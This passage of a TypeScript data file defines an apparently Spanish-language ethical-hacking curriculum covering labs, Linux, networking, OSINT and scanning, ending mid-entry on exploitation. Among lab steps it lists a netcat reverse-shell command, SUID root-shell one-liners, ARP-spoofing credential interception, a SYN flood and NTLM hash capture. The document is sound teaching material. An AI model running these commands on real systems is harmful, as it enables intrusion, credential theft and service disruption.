export interface Herramienta {
  nombre: string;
  descripcion: string;
  comando?: string;
  instalacion?: string;
}

export interface Lab {
  titulo: string;
  descripcion: string;
  pasos: string[];
  herramientas: string[];
  tips?: string[];
}

export interface Recurso {
  titulo: string;
  url: string;
  tipo: "video" | "blog" | "libro" | "herramienta" | "plataforma" | "documento";
  gratuito: boolean;
}

export type Nivel = "Principiante" | "Intermedio" | "Avanzado" | "Experto";

export interface Modulo {
  id: string;
  numero: number;
  titulo: string;
  subtitulo: string;
  descripcion: string;
  duracion: string;
  nivel: Nivel;
  icono: string;
  color: string;
  temas: string[];
  herramientas: Herramienta[];
  labs: Lab[];
  conceptosClave: { termino: string; definicion: string }[];
  recursos: Recurso[];
  consejos: string[];
}

export const MODULOS: Modulo[] = [
  {
    id: "fundamentos",
    numero: 1,
    titulo: "Fundamentos de Ciberseguridad",
    subtitulo: "Bases conceptuales, ética y marco legal",
    descripcion:
      "Antes de hackear sistemas, necesitas entender el ecosistema completo: quiénes son los actores, cuáles son las leyes, qué metodologías existen y cómo construir un laboratorio seguro. Este módulo te da el mapa mental del hacker ético profesional.",
    duracion: "2-3 semanas",
    nivel: "Principiante",
    icono: "🛡️",
    color: "polisario",
    temas: [
      "Triada CIA: Confidencialidad, Integridad y Disponibilidad",
      "Tipos de hackers: White Hat, Grey Hat, Black Hat",
      "Conceptos fundamentales: Vulnerabilidad, Amenaza, Riesgo, Exploit, Payload",
      "Marcos de trabajo: NIST, ISO 27001, OWASP, PTES",
      "Metodologías de pentesting: caja negra, caja blanca, caja gris",
      "Fases de un ataque: Reconocimiento → Escaneo → Explotación → Post-Explotación → Borrado de huellas",
      "Marco legal: Ley de Delitos Informáticos, GDPR, permisos escritos (ROE)",
      "Tipos de pruebas: pentest, red team, bug bounty",
      "Gestión de vulnerabilidades: CVE, CVSS scoring, NVD",
      "Certificaciones profesionales: orden recomendado para avanzar",
      "Configurar laboratorio con VirtualBox/VMware + Kali Linux",
      "Redes de práctica: VulnHub, DVWA, Metasploitable2",
    ],
    herramientas: [
      {
        nombre: "VirtualBox / VMware Workstation",
        descripcion: "Plataformas de virtualización para crear laboratorios seguros sin riesgo para tu máquina real",
        instalacion: "sudo apt install virtualbox || descarga desde vmware.com",
      },
      {
        nombre: "Kali Linux",
        descripcion: "Distribución de Linux diseñada específicamente para pentesting, con más de 600 herramientas preinstaladas",
        instalacion: "Descarga ISO desde kali.org/get-kali",
      },
      {
        nombre: "Metasploitable2",
        descripcion: "Máquina virtual vulnerable diseñada para practicar explotación. Nunca la expongas a internet",
        instalacion: "Descarga desde sourceforge.net/projects/metasploitable",
      },
      {
        nombre: "DVWA (Damn Vulnerable Web App)",
        descripcion: "Aplicación web intencionalmente vulnerable para practicar ataques web",
        instalacion: "docker run --rm -it -p 80:80 vulnerables/web-dvwa",
      },
    ],
    labs: [
      {
        titulo: "Configurar el laboratorio de hacking completo",
        descripcion:
          "Construye tu entorno de prácticas seguro con múltiples máquinas virtuales en red interna",
        pasos: [
          "Instala VirtualBox en tu host (Windows/Linux/macOS)",
          "Descarga e instala Kali Linux como atacante",
          "Descarga Metasploitable2 y configúrala como víctima",
          "Crea una red NAT interna en VirtualBox: Archivo → Administrador de redes host",
          "Asigna ambas VMs a la red interna (no bridged, así proteges tu red real)",
          "Desde Kali, verifica conectividad: ping <IP-Metasploitable>",
          "Instala DVWA en Docker dentro de Kali: docker run --rm -p 8080:80 vulnerables/web-dvwa",
          "Actualiza Kali: sudo apt update && sudo apt full-upgrade -y",
          "Instala herramientas adicionales: sudo apt install -y gobuster ffuf dirsearch enum4linux seclists",
          "Crea un script de inicio que muestre las IPs y estado de las VMs",
        ],
        herramientas: ["VirtualBox", "Kali Linux", "Metasploitable2", "Docker"],
        tips: [
          "Usa snapshots de VirtualBox antes de cada práctica para revertir fácilmente",
          "Nunca conectes las VMs vulnerables a internet o tu red local real",
          "Documenta todo en un diario/notas (Obsidian, CherryTree, o simple markdown)",
        ],
      },
    ],
    conceptosClave: [
      { termino: "CVE", definicion: "Common Vulnerabilities and Exposures — identificador único para vulnerabilidades conocidas (ej: CVE-2021-44228 = Log4Shell)" },
      { termino: "CVSS", definicion: "Common Vulnerability Scoring System — escala 0-10 que mide la severidad de una vulnerabilidad" },
      { termino: "Exploit", definicion: "Código o técnica que aprovecha una vulnerabilidad para producir un efecto no intencionado" },
      { termino: "Payload", definicion: "La parte del exploit que ejecuta la acción maliciosa (shell inversa, keylogger, etc.)" },
      { termino: "Zero-day (0day)", definicion: "Vulnerabilidad desconocida para el fabricante y sin parche disponible, extremadamente valiosa" },
      { termino: "APT", definicion: "Advanced Persistent Threat — actores de amenaza sofisticados (generalmente estado-nación) que operan durante meses o años" },
      { termino: "ROE", definicion: "Rules of Engagement — documento legal que define el alcance y reglas del pentest" },
      { termino: "Pentesting", definicion: "Prueba de penetración autorizada para encontrar vulnerabilidades antes que los atacantes" },
    ],
    recursos: [
      { titulo: "TryHackMe — Ruta Pre-Security", url: "https://tryhackme.com/path/outline/presecurity", tipo: "plataforma", gratuito: true },
      { titulo: "PTES — Penetration Testing Execution Standard", url: "http://www.pentest-standard.org/", tipo: "documento", gratuito: true },
      { titulo: "OWASP Testing Guide v4.2", url: "https://owasp.org/www-project-web-security-testing-guide/", tipo: "documento", gratuito: true },
      { titulo: "Hacker101 (HackerOne)", url: "https://www.hacker101.com/", tipo: "plataforma", gratuito: true },
    ],
    consejos: [
      "Nunca practiques en sistemas sin permiso escrito — es ilegal en casi todo el mundo",
      "Documenta CADA hallazgo con capturas de pantalla. Los mejores hackers son los mejores documentadores",
      "El 80% del hacking es reconocimiento. No saltes directo a explotar",
      "Aprende a programar (Python, Bash) desde el primer día — automatizarás todo",
    ],
  },

  {
    id: "linux",
    numero: 2,
    titulo: "Linux para Hackers",
    subtitulo: "Domina Kali Linux, scripting y automatización",
    descripcion:
      "Linux es el sistema operativo del hacking. Aprenderás a dominarlo como un profesional: desde la línea de comandos hasta scripting avanzado en Bash y Python. El hacker que no domina su sistema operativo está en desventaja.",
    duracion: "3-4 semanas",
    nivel: "Principiante",
    icono: "🐧",
    color: "night",
    temas: [
      "Filosofía Unix y estructura del sistema de archivos (FHS)",
      "Comandos esenciales: ls, find, grep, awk, sed, cut, sort, uniq, wc",
      "Gestión de procesos: ps, top, htop, kill, nice, jobs, fg, bg",
      "Permisos Unix: chmod, chown, umask, SUID, SGID, sticky bit",
      "Usuarios y grupos: /etc/passwd, /etc/shadow, /etc/group",
      "Redes desde CLI: ip, ifconfig, netstat, ss, nmap, curl, wget",
      "Gestión de paquetes: apt, dpkg, pip, gem, cargo",
      "Redirección, pipes y sustitución de comandos: |, >, >>, 2>&1, $()",
      "Variables de entorno y PATH hijacking",
      "Scripting Bash avanzado: funciones, arrays, regex, getopt",
      "Python para hacking: sockets, requests, paramiko, scapy, pwntools",
      "Tmux y screen: multiplexación de terminales para ataques largos",
      "SSH avanzado: tunneling, port forwarding, ProxyJump, sshpass",
      "Cron jobs, systemd y persistencia via servicios",
      "Análisis de binarios: file, strings, xxd, ltrace, strace",
    ],
    herramientas: [
      {
        nombre: "Bash",
        descripcion: "Shell por defecto en la mayoría de sistemas Linux. Esencial para scripting de automatización",
        comando: "bash --version && echo $SHELL",
      },
      {
        nombre: "Python 3",
        descripcion: "El lenguaje de programación más usado en ciberseguridad. Imprescindible para escribir exploits",
        comando: "python3 -c 'import sys; print(sys.version)'",
        instalacion: "sudo apt install python3 python3-pip",
      },
      {
        nombre: "pwntools",
        descripcion: "Framework de Python para exploit development. Maneja sockets, procesos, ELF y ROP",
        instalacion: "pip3 install pwntools",
        comando: "python3 -c 'from pwn import *; print(cyclic(100))'",
      },
      {
        nombre: "tmux",
        descripcion: "Multiplexador de terminal — divide la pantalla, mantiene sesiones vivas y es esencial en pentests largos",
        instalacion: "sudo apt install tmux",
        comando: "tmux new -s pentest",
      },
      {
        nombre: "Scapy",
        descripcion: "Librería Python para manipulación de paquetes de red. Puedes crear, enviar y capturar paquetes raw",
        instalacion: "pip3 install scapy",
        comando: "sudo python3 -c 'from scapy.all import *; print(IP().show())'",
      },
    ],
    labs: [
      {
        titulo: "Script de reconocimiento automático en Bash",
        descripcion:
          "Crea un script que automatice las primeras fases de reconocimiento de una IP/dominio objetivo",
        pasos: [
          "Crea el archivo: nano ~/recon.sh",
          "Añade el shebang y variables: #!/bin/bash\\nTARGET=$1\\nOUTDIR=~/recon/$TARGET",
          "Crea el directorio de salida: mkdir -p $OUTDIR",
          "Ping sweep: nmap -sn $TARGET -oN $OUTDIR/hosts.txt",
          "Escaneo rápido de puertos: nmap -T4 -F $TARGET -oN $OUTDIR/quick_ports.txt",
          "Escaneo completo en background: nmap -sC -sV -p- $TARGET -oN $OUTDIR/full_scan.txt &",
          "Búsqueda de subdominios si es dominio: subfinder -d $TARGET -o $OUTDIR/subdomains.txt",
          "Whois: whois $TARGET > $OUTDIR/whois.txt",
          "DNS lookup: dig any $TARGET > $OUTDIR/dns.txt",
          "Dale permisos: chmod +x ~/recon.sh && ./recon.sh 192.168.1.1",
        ],
        herramientas: ["bash", "nmap", "subfinder", "dig", "whois"],
        tips: [
          "Añade colores con \\e[32m (verde) para resaltar resultados importantes",
          "Usa 'tee' para ver y guardar output simultáneamente: comando | tee archivo.txt",
          "Agrega timestamp con date +%Y%m%d_%H%M%S para logs únicos",
        ],
      },
      {
        titulo: "Escalada de privilegios via SUID",
        descripcion: "Encuentra y explota binarios con bit SUID mal configurados para obtener acceso root",
        pasos: [
          "Busca binarios con SUID: find / -perm -4000 -type f 2>/dev/null",
          "Identifica binarios inusuales (cualquier cosa fuera de /bin, /usr/bin)",
          "Consulta GTFOBins.github.io para la técnica de explotación",
          "Ejemplo con 'find': find . -exec /bin/sh \\; -quit",
          "Ejemplo con 'vim': vim -c ':!/bin/sh'",
          "Ejemplo con 'python': python3 -c 'import os; os.execl(\"/bin/sh\", \"sh\", \"-p\")'",
          "Verifica que eres root: id && whoami",
        ],
        herramientas: ["find", "GTFOBins", "bash"],
        tips: [
          "GTFOBins (gtfobins.github.io) es tu biblia para bypass de permisos Unix",
          "El flag -p en sh mantiene el UID efectivo del proceso padre (root en SUID)",
        ],
      },
    ],
    conceptosClave: [
      { termino: "SUID", definicion: "Set User ID — bit especial que hace que un ejecutable corra como su propietario (si es root = escalada de privilegios)" },
      { termino: "Shebang", definicion: "Primera línea de un script (#!/bin/bash) que indica qué intérprete usar" },
      { termino: "Pipe (|)", definicion: "Operador que pasa el stdout de un comando al stdin del siguiente. El corazón del poder Unix" },
      { termino: "Subshell $()", definicion: "Ejecuta un comando y sustituye su output en el lugar: echo $(whoami) → root" },
      { termino: "/etc/shadow", definicion: "Archivo que contiene los hashes de contraseñas de los usuarios — solo accesible como root" },
      { termino: "PATH", definicion: "Variable de entorno que define dónde buscar ejecutables. Manipularla puede llevar a escalada de privilegios" },
    ],
    recursos: [
      { titulo: "OverTheWire: Bandit (wargames Linux)", url: "https://overthewire.org/wargames/bandit/", tipo: "plataforma", gratuito: true },
      { titulo: "GTFOBins — Unix binaries abuse", url: "https://gtfobins.github.io/", tipo: "herramienta", gratuito: true },
      { titulo: "explainshell.com — entiende cualquier comando", url: "https://explainshell.com/", tipo: "herramienta", gratuito: true },
      { titulo: "The Linux Command Line (libro gratuito)", url: "https://linuxcommand.org/tlcl.php", tipo: "libro", gratuito: true },
      { titulo: "Python para Hacking — TCM Security", url: "https://academy.tcm-sec.com/p/python-201-for-hackers", tipo: "video", gratuito: false },
    ],
    consejos: [
      "Aprende a escribir scripts desde el día 1, no copies y pegues — entiende cada línea",
      "Practica en OverTheWire Bandit hasta completar todos los niveles antes de pasar al siguiente módulo",
      "Alias frecuentes: alias ll='ls -la' y alias update='sudo apt update && sudo apt upgrade -y'",
      "Conocer awk y sed te hará parecer un mago ante otros pentesters",
    ],
  },

  {
    id: "redes",
    numero: 3,
    titulo: "Redes y Protocolos",
    subtitulo: "TCP/IP profundo, análisis de tráfico y ataques de red",
    descripcion:
      "Las redes son el campo de batalla del hacker. Entender cómo funcionan los protocolos a nivel de bits te permite manipularlos, interceptarlos y explotarlos. Este módulo te convierte en un experto en comunicaciones.",
    duracion: "3-4 semanas",
    nivel: "Principiante",
    icono: "🌐",
    color: "sun",
    temas: [
      "Modelo OSI vs TCP/IP: cada capa y sus protocolos",
      "Subnetting avanzado, CIDR, VLSM — cálculo mental de redes",
      "ARP: funcionamiento, ARP Spoofing, ARP Cache Poisoning",
      "DNS: tipos de registros (A, MX, TXT, NS, PTR, SRV), zone transfer, DNS tunneling",
      "HTTP/HTTPS: métodos, headers, cookies, sesiones, TLS handshake",
      "SMB/CIFS: recurso compartido de Windows, autenticación NTLM, Kerberos",
      "FTP, Telnet, SSH: diferencias de seguridad y ataques",
      "ICMP: ping, traceroute, ICMP tunneling",
      "TCP: flags (SYN, ACK, RST, FIN), three-way handshake, port scanning",
      "UDP: características, DNS, SNMP, ataques amplificación DDoS",
      "VLANs, VLAN hopping, 802.1Q",
      "WiFi: WPA2/WPA3, PMKID attack, evil twin, captive portals",
      "Firewalls, IDS/IPS: evasión con fragmentación, decoy scans",
      "VPN y proxies: análisis de tráfico cifrado",
    ],
    herramientas: [
      {
        nombre: "Wireshark",
        descripcion: "El analizador de protocolos más usado del mundo. Captura y analiza tráfico de red en tiempo real",
        instalacion: "sudo apt install wireshark",
        comando: "wireshark &",
      },
      {
        nombre: "tcpdump",
        descripcion: "Captura de paquetes desde CLI — esencial cuando no tienes GUI. Perfecto para servidores remotos",
        instalacion: "sudo apt install tcpdump",
        comando: "sudo tcpdump -i eth0 -w captura.pcap port 80",
      },
      {
        nombre: "netcat (nc)",
        descripcion: "La navaja suiza de las redes: crear listeners, transferir archivos, escanear puertos, crear backdoors",
        comando: "nc -lvnp 4444  # listener || nc -e /bin/bash IP 4444  # reverse shell",
      },
      {
        nombre: "Ettercap",
        descripcion: "Suite completa para ataques Man-in-the-Middle en redes locales (ARP poisoning, DNS spoofing)",
        instalacion: "sudo apt install ettercap-graphical",
        comando: "sudo ettercap -T -q -i eth0 -M arp:remote /IP_GATEWAY// /IP_VICTIM//",
      },
      {
        nombre: "hping3",
        descripcion: "Generador de paquetes TCP/UDP/ICMP — ideal para fingerprinting y testing de firewalls",
        instalacion: "sudo apt install hping3",
        comando: "sudo hping3 -S --flood -V -p 80 192.168.1.1",
      },
      {
        nombre: "Responder",
        descripcion: "Envenena LLMNR/NBT-NS para capturar hashes NTLMv2 en redes Windows sin user interaction",
        instalacion: "sudo apt install responder",
        comando: "sudo responder -I eth0 -rdwv",
      },
    ],
    labs: [
      {
        titulo: "ARP Spoofing + Man-in-the-Middle",
        descripcion:
          "Intercepta el tráfico entre dos máquinas en tu lab usando ARP Poisoning. Observa credenciales en texto claro",
        pasos: [
          "Activa IP forwarding: echo 1 | sudo tee /proc/sys/net/ipv4/ip_forward",
          "Identifica IPs: ip neighbor (o arp-scan -l)",
          "Lanza ARP spoofing con arpspoof: sudo arpspoof -i eth0 -t VICTIM_IP GATEWAY_IP",
          "En otra terminal: sudo arpspoof -i eth0 -t GATEWAY_IP VICTIM_IP",
          "Captura el tráfico: sudo tcpdump -i eth0 -w mitm.pcap not arp",
          "Analiza en Wireshark: wireshark mitm.pcap",
          "Filtra credenciales HTTP: http.request.method==POST",
          "Para limpiar: mata arpspoof y desactiva ip_forward: echo 0 > /proc/sys/net/ipv4/ip_forward",
        ],
        herramientas: ["arpspoof", "tcpdump", "Wireshark"],
        tips: [
          "Solo funciona en redes sin switches gestionados con Dynamic ARP Inspection (DAI)",
          "En redes con HTTPS todo estará cifrado — pero puedes ver los dominios vía SNI en TLS",
          "Combina con sslstrip para degradar HTTPS a HTTP (cada vez menos efectivo por HSTS)",
        ],
      },
      {
        titulo: "DNS Zone Transfer y enumeración DNS",
        descripcion: "Extrae toda la información DNS de un dominio mal configurado",
        pasos: [
          "Encuentra los servidores DNS: dig NS dominio.com",
          "Intenta zone transfer: dig axfr @ns1.dominio.com dominio.com",
          "Si falla (configurado bien), usa enumeración: dnsenum dominio.com",
          "Busca subdominios: fierce --domain dominio.com",
          "Consulta registros específicos: dig txt dominio.com | dig mx dominio.com",
          "Reverse DNS lookup: dig -x 93.184.216.34",
          "Subdomain bruteforce: gobuster dns -d dominio.com -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt",
        ],
        herramientas: ["dig", "dnsenum", "fierce", "gobuster"],
        tips: [
          "Zone transfers solo funcionan en servidores mal configurados, pero son goldmines de información",
          "Los registros TXT suelen contener tokens SPF, DMARC, y a veces credenciales olvidadas",
        ],
      },
    ],
    conceptosClave: [
      { termino: "Three-Way Handshake", definicion: "SYN → SYN-ACK → ACK: proceso de establecimiento de conexión TCP. Conocerlo permite ataques SYN flood" },
      { termino: "NTLM Hash", definicion: "Formato de hash de contraseñas Windows capturado via SMB. Se puede crackear offline o usar en Pass-the-Hash" },
      { termino: "Zone Transfer (AXFR)", definicion: "Mecanismo DNS para replicar zonas entre servidores. Mal configurado revela TODA la infraestructura DNS" },
      { termino: "VLAN Hopping", definicion: "Técnica para acceder a VLANs no autorizadas explotando el protocolo 802.1Q" },
      { termino: "MITM", definicion: "Man-in-the-Middle — el atacante se posiciona entre dos partes para interceptar/modificar comunicaciones" },
    ],
    recursos: [
      { titulo: "Practical Networking (YouTube)", url: "https://www.youtube.com/c/PracticalNetworking", tipo: "video", gratuito: true },
      { titulo: "Wireshark Network Analysis (libro)", url: "https://www.wiresharkbook.com/", tipo: "libro", gratuito: false },
      { titulo: "TryHackMe: Pre-Security Path (Networking)", url: "https://tryhackme.com/module/network-fundamentals", tipo: "plataforma", gratuito: true },
      { titulo: "Cisco Packet Tracer (simulador de redes)", url: "https://www.netacad.com/courses/packet-tracer", tipo: "herramienta", gratuito: true },
    ],
    consejos: [
      "Instala Wireshark y analiza tu propio tráfico mientras navegas — aprenderás muchísimo",
      "Aprende subnetting de memoria: los cálculos de red son preguntas en TODAS las certificaciones",
      "Entiende HTTP antes de atacarlo — lee las RFCs si puedes",
    ],
  },

  {
    id: "osint",
    numero: 4,
    titulo: "Reconocimiento y OSINT",
    subtitulo: "Inteligencia de fuentes abiertas y reconocimiento pasivo",
    descripcion:
      "El reconocimiento es la fase más importante de cualquier ataque. Un hacker que sabe recopilar información puede comprometer sistemas sin lanzar un solo exploit. OSINT (Open Source Intelligence) es el arte de conocer todo sobre un objetivo usando solo información pública.",
    duracion: "2-3 semanas",
    nivel: "Principiante",
    icono: "🔍",
    color: "sand",
    temas: [
      "Reconocimiento pasivo vs activo: cuándo usar cada uno",
      "Google Dorks avanzados: operadores site:, filetype:, inurl:, intitle:, intext:, cache:",
      "Shodan: el buscador de dispositivos conectados a internet",
      "Censys y ZoomEye: alternativas a Shodan",
      "WHOIS, RDAP y registros de dominio",
      "Certificate Transparency Logs (crt.sh) para subdominios",
      "theHarvester: emails, nombres, IPs, subdominios",
      "Recon-ng: framework modular de reconocimiento",
      "Maltego: visualización gráfica de relaciones",
      "Enumeración de subdominios: Sublist3r, Amass, Subfinder, Assetfinder",
      "GitHub/GitLab dorking: buscar credenciales expuestas en código",
      "LinkedIn OSINT: estructura organizacional",
      "Hunter.io, Phonebook.cz: emails corporativos",
      "Wayback Machine: versiones históricas de sitios",
      "Shodan dorks avanzados para IoT, cámaras, PLCs",
    ],
    herramientas: [
      {
        nombre: "theHarvester",
        descripcion: "Recopila emails, subdominios, IPs, URLs desde múltiples fuentes (Google, Bing, Shodan, GitHub)",
        instalacion: "sudo apt install theharvester",
        comando: "theHarvester -d empresa.com -l 500 -b all",
      },
      {
        nombre: "Amass",
        descripcion: "La herramienta más completa para enumeración de subdominios — usa múltiples técnicas activas y pasivas",
        instalacion: "sudo apt install amass",
        comando: "amass enum -passive -d empresa.com -o subdominios.txt",
      },
      {
        nombre: "Subfinder",
        descripcion: "Enumeración rápida de subdominios usando fuentes pasivas (crt.sh, VirusTotal, Shodan, etc.)",
        instalacion: "go install github.com/projectdiscovery/subfinder/v2/cmd/subfinder@latest",
        comando: "subfinder -d empresa.com -all -o subs.txt",
      },
      {
        nombre: "Shodan CLI",
        descripcion: "Busca dispositivos, vulnerabilidades y servicios expuestos a internet en toda la red",
        instalacion: "pip3 install shodan && shodan init TU_API_KEY",
        comando: "shodan search --fields ip_str,port,org 'apache country:ES'",
      },
      {
        nombre: "Recon-ng",
        descripcion: "Framework modular tipo Metasploit pero para reconocimiento. Más de 100 módulos disponibles",
        instalacion: "sudo apt install recon-ng",
        comando: "recon-ng -w workspace_nombre",
      },
      {
        nombre: "GitLeaks",
        descripcion: "Detecta credenciales, API keys y secretos expuestos en repositorios Git",
        instalacion: "sudo apt install gitleaks",
        comando: "gitleaks detect --source=. --report-format json --report-path leaks.json",
      },
    ],
    labs: [
      {
        titulo: "OSINT completo de una empresa objetivo",
        descripcion:
          "Realiza un perfil completo de una organización usando solo fuentes públicas. Usa empresas ficticias o las tuyas propias",
        pasos: [
          "Define el objetivo: empresa.com (usa tesla.com para practicar, está en scope de bug bounty)",
          "WHOIS y DNS: whois empresa.com && dig any empresa.com",
          "Subdominios pasivos: subfinder -d empresa.com | tee subs.txt",
          "Subdominios activos: amass enum -active -d empresa.com",
          "Certificate Transparency: curl -s 'https://crt.sh/?q=%25.empresa.com&output=json' | jq '.[].name_value' | sort -u",
          "Emails: theHarvester -d empresa.com -b google,bing,linkedin",
          "GitHub dorking: busca en github.com 'empresa.com password' o 'empresa.com api_key'",
          "Shodan: shodan search 'hostname:empresa.com'",
          "Tecnologías web: whatweb empresa.com && wappalyzer (extensión navegador)",
          "Organiza todo en un informe con las IPs, emails, subdominios y tecnologías encontradas",
        ],
        herramientas: ["subfinder", "amass", "theHarvester", "Shodan", "dig", "whatweb"],
        tips: [
          "crt.sh es gratis y enormemente poderoso para subdominios via SSL certs",
          "Siempre verifica si la empresa tiene bug bounty antes de tocar nada activo",
          "GitLeaks puede encontrar AWS keys olvidadas — vale millones en bounties",
        ],
      },
    ],
    conceptosClave: [
      { termino: "ASN", definicion: "Autonomous System Number — identificador único de un conjunto de redes bajo una misma política de routing (ej: AS15169 = Google)" },
      { termino: "OSINT", definicion: "Open Source Intelligence — obtención de información de fuentes públicamente disponibles sin acceso no autorizado" },
      { termino: "Footprinting", definicion: "Primera fase del hacking: recopilar información del objetivo para entender su superficie de ataque" },
      { termino: "Certificate Transparency", definicion: "Registro público de certificados TLS — revela subdominios sin escaneo activo" },
      { termino: "Google Dork", definicion: "Búsqueda avanzada en Google que usa operadores especiales para encontrar información sensible indexada" },
    ],
    recursos: [
      { titulo: "OSINT Framework", url: "https://osintframework.com/", tipo: "herramienta", gratuito: true },
      { titulo: "Trace Labs OSINT CTF", url: "https://www.tracelabs.org/", tipo: "plataforma", gratuito: true },
      { titulo: "IntelTechniques (Michael Bazzell)", url: "https://inteltechniques.com/", tipo: "blog", gratuito: true },
      { titulo: "The OSINT Curious Project", url: "https://osintcurio.us/", tipo: "blog", gratuito: true },
    ],
    consejos: [
      "El reconocimiento pasivo NO genera logs en el objetivo — úsalo siempre primero",
      "Shodan con API key premium te da acceso a datos de vulnerabilidades directamente",
      "GitHub es la fuente número 1 de filtraciones accidentales de credenciales en empresas",
    ],
  },

  {
    id: "escaneo",
    numero: 5,
    titulo: "Escaneo y Enumeración",
    subtitulo: "Nmap maestro, enumeración de servicios y vulnerabilidades",
    descripcion:
      "Una vez identificado el objetivo, necesitas mapear exactamente qué servicios corren, en qué versiones, y qué vulnerabilidades tienen. Esta fase convierte información general en vectores de ataque concretos.",
    duracion: "3-4 semanas",
    nivel: "Intermedio",
    icono: "🔭",
    color: "polisario",
    temas: [
      "Nmap completo: -sS, -sT, -sU, -sA, -sN, -sF, -sX, -sO",
      "Nmap timing: -T0 a -T5, fragmentación, decoys (-D), source port",
      "Nmap NSE: scripts de vulnerabilidades, brute force, discovery",
      "Detección de versiones: -sV, -sC, --version-intensity",
      "OS fingerprinting: -O, nmap --osscan-guess",
      "Nikto: escaneo de vulnerabilidades web básico",
      "Gobuster/Feroxbuster: fuzzing de directorios y archivos",
      "enum4linux-ng: enumeración SMB/SAMBA completa",
      "smbclient, smbmap: acceso a recursos compartidos",
      "rpcclient: enumeración RPC en Windows",
      "SNMPwalk: enumeración SNMP con community strings",
      "ldapsearch: enumeración de Active Directory vía LDAP",
      "WPScan: auditoría de WordPress",
      "Nessus y OpenVAS: escáneres de vulnerabilidades profesionales",
      "Masscan: escaneo ultrarrápido de internet (1M paquetes/seg)",
    ],
    herramientas: [
      {
        nombre: "Nmap",
        descripcion: "La herramienta de escaneo de redes más poderosa. Escanea puertos, detecta versiones, OS y vulnerabilidades",
        instalacion: "sudo apt install nmap",
        comando: "sudo nmap -sC -sV -O -A --script vuln -p- -oN full_scan.txt IP",
      },
      {
        nombre: "Gobuster",
        descripcion: "Fuzzer de directorios web ultrarrápido en Go — encuentra rutas ocultas, paneles admin, archivos sensibles",
        instalacion: "sudo apt install gobuster",
        comando: "gobuster dir -u http://IP -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -x php,txt,html",
      },
      {
        nombre: "Feroxbuster",
        descripcion: "Alternativa moderna a gobuster con recursividad automática — escaneará hasta encontrar todo",
        instalacion: "sudo apt install feroxbuster",
        comando: "feroxbuster -u http://IP -w /usr/share/seclists/Discovery/Web-Content/raft-large-directories.txt -x php,html",
      },
      {
        nombre: "enum4linux-ng",
        descripcion: "Enumeración completa de SMB: usuarios, grupos, políticas, recursos compartidos, OS",
        instalacion: "pip3 install enum4linux-ng",
        comando: "enum4linux-ng -A IP",
      },
      {
        nombre: "Nikto",
        descripcion: "Escáner de vulnerabilidades web — detecta archivos peligrosos, configuraciones inseguras, versiones antiguas",
        instalacion: "sudo apt install nikto",
        comando: "nikto -h http://IP -o nikto_output.txt",
      },
    ],
    labs: [
      {
        titulo: "Escaneo completo de Metasploitable2",
        descripcion: "Realiza un escaneo profesional completo de tu VM Metasploitable2 con todas las herramientas",
        pasos: [
          "Descubre la IP de Metasploitable: sudo netdiscover -r 192.168.56.0/24",
          "Escaneo rápido: sudo nmap -sS -T4 -F $VICTIM_IP",
          "Escaneo completo: sudo nmap -sC -sV -A -p- -oN meta_full.txt $VICTIM_IP",
          "Analiza los resultados: identifica FTP 21, SSH 22, HTTP 80, SMB 139/445, MySQL 3306",
          "Enumeración SMB: enum4linux-ng -A $VICTIM_IP",
          "Accede al SMB anónimo: smbclient -L //$VICTIM_IP -N",
          "Escaneo web: nikto -h http://$VICTIM_IP",
          "Fuzzing de directorios: gobuster dir -u http://$VICTIM_IP -w /usr/share/wordlists/dirb/common.txt",
          "NSE scripts de vuln: sudo nmap --script vuln $VICTIM_IP -oN vuln_scan.txt",
          "Documenta TODOS los servicios y posibles vectores de ataque en una tabla",
        ],
        herramientas: ["nmap", "enum4linux-ng", "smbclient", "nikto", "gobuster"],
        tips: [
          "Siempre guarda los outputs con -oN (normal), -oX (xml), -oG (grep) para revisitar",
          "El escaneo -p- tarda mucho — usa -F primero para resultados rápidos",
          "NSE scripts: 'vuln' puede generar falsos positivos, úsalo como guía no como verdad absoluta",
        ],
      },
    ],
    conceptosClave: [
      { termino: "SYN Scan (-sS)", definicion: "Half-open scan: envía SYN, recibe SYN-ACK, nunca completa el handshake. Más sigiloso, requiere root" },
      { termino: "Banner Grabbing", definicion: "Técnica para obtener la versión de un servicio conectándose y leyendo su respuesta inicial" },
      { termino: "NSE", definicion: "Nmap Scripting Engine — sistema de scripts Lua que extiende Nmap con cientos de capacidades adicionales" },
      { termino: "Community String", definicion: "Contraseña de SNMP v1/v2c. 'public' (lectura) y 'private' (escritura) son los valores por defecto" },
    ],
    recursos: [
      { titulo: "Nmap Network Scanning (libro oficial)", url: "https://nmap.org/book/", tipo: "libro", gratuito: true },
      { titulo: "SecLists — colección de wordlists", url: "https://github.com/danielmiessler/SecLists", tipo: "herramienta", gratuito: true },
      { titulo: "HackTricks — técnicas de enumeración", url: "https://book.hacktricks.xyz/", tipo: "blog", gratuito: true },
    ],
    consejos: [
      "SecLists es tu mejor amigo — 10GB de wordlists para todo tipo de fuzzing",
      "Nmap -p- tarda pero encuentra puertos no estándar que los escaneos rápidos pierden",
      "Guarda siempre los outputs — revisarás información horas después",
    ],
  },

  {
    id: "explotacion",
    numero: 6,
    titulo: "Explotación de Vulnerabilidades",
    subtitulo: "Metasploit, exploits manuales y desarrollo básico de exploits",
    descripcion:
      "Esta es la fase donde la información recopilada se convierte en acceso. Aprenderás a usar el framework más poderoso del mundo (Metasploit), a buscar y adaptar exploits públicos, y los fundamentos del desarrollo de exploits — incluyendo Buffer Overflow.",
    duracion: "4-6 semanas",
    nivel: "Intermedio",
    icono: "💥",
    color: "alert",
    temas: [
      "Metasploit Framework: arquitectura, módulos (exploit, payload, auxiliary, post)",
      "msfconsole: search, use, show options, set, run, sessions",
      "Payloads: singles, stagers, stages — Meterpreter vs shell",
      "msfvenom: generación de payloads para todos los OS/arquitecturas",
      "Searchsploit y Exploit-DB: encontrar exploits públicos",
      "Adaptar exploits de Python 2 a Python 3",
      "Vulnerabilidades clásicas: EternalBlue (MS17-010), BlueKeep, Log4Shell",
      "Buffer Overflow básico: teoría de stack, EIP overwrite, bad chars, shellcode",
      "Introducción a pwntools para exploit development",
      "Bypasses básicos de ASLR/DEP con ret2libc",
      "Ataques de fuerza bruta: Hydra, Medusa, CrackMapExec",
      "Password spraying: una contraseña contra muchos usuarios",
      "Explotación de servicios: FTP anónimo, SSH, MySQL, RDP",
      "Web shells: PHP, ASP, ASPX — subida y uso",
    ],
    herramientas: [
      {
        nombre: "Metasploit Framework",
        descripcion: "El framework de explotación más usado del mundo. Más de 2000 exploits para todas las plataformas",
